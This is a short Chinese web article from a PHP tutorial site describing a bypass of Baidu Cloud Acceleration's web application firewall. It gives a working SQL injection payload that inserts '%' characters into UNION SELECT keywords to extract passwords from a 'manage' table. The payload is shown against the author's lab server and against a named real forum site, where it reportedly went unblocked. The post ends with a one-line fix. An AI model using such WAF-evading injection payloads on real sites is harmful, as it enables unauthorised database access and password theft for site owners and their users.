网站地图    收藏   

子栏目

主页 > 入门引导 > 黑客攻防 >

百度云加速waf绕过 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:

[导读] http: www im286 com forum php?id=1 and 1=1通过这个知道 该网站用了 百度云加速的waf。但是百度waf由于没有对%号字符做处理 导致SQL注入被绕过。这是我自己搭的环境。htpp: 192 168 1 100 test2 asp?id...

http://www.im286.com/forum.php?id=1 and 1=1通过这个知道 该网站用了 百度云加速的waf。

但是百度waf由于没有对%号字符做处理 导致SQL注入被绕过。

这是我自己搭的环境。

htpp://192.168.1.100/test2.asp?id=1%20un%ion%20se%l%e%ct%201,2,3,4,5,pass%20from%20manage

顺利注射出password而这个站点

http://www.im286.com/1.asp?id=1%20un%ion%20se%l%e%ct%201,2,3,4,5,pass%20from%20manage

顺利通过没有拦截。

修复方案:

对%做处理

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论